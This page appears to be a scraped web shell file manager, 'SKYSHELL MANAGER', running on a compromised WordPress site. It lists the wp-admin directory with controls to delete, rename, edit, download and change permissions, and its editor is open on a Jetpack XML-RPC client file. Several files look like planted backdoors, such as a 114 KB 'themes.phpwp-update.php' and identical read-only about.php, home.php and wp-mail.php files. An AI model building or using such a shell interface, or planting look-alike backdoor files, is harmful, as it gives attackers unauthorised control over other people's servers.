📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: class.jetpack-ixr-client.php
<?php defined( 'ABSPATH' ) or die( 'No direct access, please.' ); require_once( ABSPATH . WPINC . '/class-IXR.php' ); /** * IXR_Client * * @package IXR * @since 1.5 * */ class Jetpack_IXR_Client extends IXR_Client { public $jetpack_args = null; function __construct( $args = array(), $path = false, $port = 80, $timeout = 15 ) { $defaults = array( 'url' => Jetpack::xmlrpc_api_url(), 'user_id' => 0, ); $args = wp_parse_args( $args, $defaults ); $this->jetpack_args = $args; $this->IXR_Client( $args['url'], $path, $port, $timeout ); } function query() { $args = func_get_args(); $method = array_shift( $args ); $request = new IXR_Request( $method, $args ); $xml = trim( $request->getXml() ); $response = Jetpack_Client::remote_request( $this->jetpack_args, $xml ); if ( is_wp_error( $response ) ) { $this->error = new IXR_Error( -10520, sprintf( 'Jetpack: [%s] %s', $response->get_error_code(), $response->get_error_message() ) ); return false; } if ( !$response ) { $this->error = new IXR_Error( -10520, 'Jetpack: Unknown Error' ); return false; } if ( 200 != wp_remote_retrieve_response_code( $response ) ) { $this->error = new IXR_Error( -32300, 'transport error - HTTP status code was not 200' ); return false; } $content = wp_remote_retrieve_body( $response ); // Now parse what we've got back $this->message = new IXR_Message( $content ); if ( !$this->message->parse() ) { // XML error $this->error = new IXR_Error( -32700, 'parse error. not well formed' ); return false; } // Is the message a fault? if ( $this->message->messageType == 'fault' ) { $this->error = new IXR_Error( $this->message->faultCode, $this->message->faultString ); return false; } // Message must be OK return true; } function get_jetpack_error( $fault_code = null, $fault_string = null ) { if ( is_null( $fault_code ) ) { $fault_code = $this->error->code; } if ( is_null( $fault_string ) ) { $fault_string = $this->error->message; } if ( preg_match( '#jetpack:\s+\[(\w+)\]\s*(.*)?$#i', $fault_string, $match ) ) { $code = $match[1]; $message = $match[2]; $status = $fault_code; return new Jetpack_Error( $code, $message, $status ); } return new Jetpack_Error( "IXR_{$fault_code}", $fault_string ); } } /** * IXR_ClientMulticall * * @package IXR * @since 1.5 */ class Jetpack_IXR_ClientMulticall extends Jetpack_IXR_Client { public $calls = array(); function __construct( $args = array(), $path = false, $port = 80, $timeout = 15 ) { parent::__construct( $args, $path, $port, $timeout ); } function addCall() { $args = func_get_args(); $methodName = array_shift( $args ); $struct = array( 'methodName' => $methodName, 'params' => $args ); $this->calls[] = $struct; } function query() { usort( $this->calls, array( $this, 'sort_calls' ) ); // Prepare multicall, then call the parent::query() method return parent::query( 'system.multicall', $this->calls ); } // Make sure syncs are always done first function sort_calls( $a, $b ) { if ( 'jetpack.syncContent' == $a['methodName'] ) { return -1; } if ( 'jetpack.syncContent' == $b['methodName'] ) { return 1; } return 0; } }
Save